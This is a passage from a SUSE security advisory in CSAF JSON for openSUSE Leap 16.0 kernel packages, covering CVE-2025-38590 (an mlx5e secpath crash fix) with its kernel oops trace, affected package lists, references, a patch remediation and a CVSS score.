"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38589"
},
{
"cve": "CVE-2025-38590",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38590"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Remove skb secpath if xfrm state is not found\n\nHardware returns a unique identifier for a decrypted packet\u0027s xfrm\nstate, this state is looked up in an xarray. However, the state might\nhave been freed by the time of this lookup.\n\nCurrently, if the state is not found, only a counter is incremented.\nThe secpath (sp) extension on the skb is not removed, resulting in\nsp-\u003elen becoming 0.\n\nSubsequently, functions like __xfrm_policy_check() attempt to access\nfields such as xfrm_input_state(skb)-\u003exso.type (which dereferences\nsp-\u003exvec[sp-\u003elen - 1]) without first validating sp-\u003elen. This leads to\na crash when dereferencing an invalid state pointer.\n\nThis patch prevents the crash by explicitly removing the secpath\nextension from the skb if the xfrm state is not found after hardware\ndecryption. This ensures downstream functions do not operate on a\nzero-length secpath.\n\n BUG: unable to handle page fault for address: ffffffff000002c8\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 282e067 P4D 282e067 PUD 0\n Oops: Oops: 0000 [#1] SMP\n CPU: 12 UID: 0 PID: 0 Comm: swapper/12 Not tainted 6.15.0-rc7_for_upstream_min_debug_2025_05_27_22_44 #1 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__xfrm_policy_check+0x61a/0xa30\n Code: b6 77 7f 83 e6 02 74 14 4d 8b af d8 00 00 00 41 0f b6 45 05 c1 e0 03 48 98 49 01 c5 41 8b 45 00 83 e8 01 48 98 49 8b 44 c5 10 \u003c0f\u003e b6 80 c8 02 00 00 83 e0 0c 3c 04 0f 84 0c 02 00 00 31 ff 80 fa\n RSP: 0018:ffff88885fb04918 EFLAGS: 00010297\n RAX: ffffffff00000000 RBX: 0000000000000002 RCX: 0000000000000000\n RDX: 0000000000000002 RSI: 0000000000000002 RDI: 0000000000000000\n RBP: ffffffff8311af80 R08: 0000000000000020 R09: 00000000c2eda353\n R10: ffff88812be2bbc8 R11: 000000001faab533 R12: ffff88885fb049c8\n R13: ffff88812be2bbc8 R14: 0000000000000000 R15: ffff88811896ae00\n FS: 0000000000000000(0000) GS:ffff8888dca82000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffffff000002c8 CR3: 0000000243050002 CR4: 0000000000372eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cIRQ\u003e\n ? try_to_wake_up+0x108/0x4c0\n ? udp4_lib_lookup2+0xbe/0x150\n ? udp_lib_lport_inuse+0x100/0x100\n ? __udp4_lib_lookup+0x2b0/0x410\n __xfrm_policy_check2.constprop.0+0x11e/0x130\n udp_queue_rcv_one_skb+0x1d/0x530\n udp_unicast_rcv_skb+0x76/0x90\n __udp4_lib_rcv+0xa64/0xe90\n ip_protocol_deliver_rcu+0x20/0x130\n ip_local_deliver_finish+0x75/0xa0\n ip_local_deliver+0xc1/0xd0\n ? ip_protocol_deliver_rcu+0x130/0x130\n ip_sublist_rcv+0x1f9/0x240\n ? ip_rcv_finish_core+0x430/0x430\n ip_list_rcv+0xfc/0x130\n __netif_receive_skb_list_core+0x181/0x1e0\n netif_receive_skb_list_internal+0x200/0x360\n ? mlx5e_build_rx_skb+0x1bc/0xda0 [mlx5_core]\n gro_receive_skb+0xfd/0x210\n mlx5e_handle_rx_cqe_mpwrq+0x141/0x280 [mlx5_core]\n mlx5e_poll_rx_cq+0xcc/0x8e0 [mlx5_core]\n ? mlx5e_handle_rx_dim+0x91/0xd0 [mlx5_core]\n mlx5e_napi_poll+0x114/0xab0 [mlx5_core]\n __napi_poll+0x25/0x170\n net_rx_action+0x32d/0x3a0\n ? mlx5_eq_comp_int+0x8d/0x280 [mlx5_core]\n ? notifier_call_chain+0x33/0xa0\n handle_softirqs+0xda/0x250\n irq_exit_rcu+0x6d/0xc0\n common_interrupt+0x81/0xa0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38590",
"url": "https://www.suse.com/security/cve/CVE-2025-38590"
},
{
"category": "external",
"summary": "SUSE Bug 1248360 for CVE-2025-38590",
"url": "https://bugzilla.suse.com/1248360"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
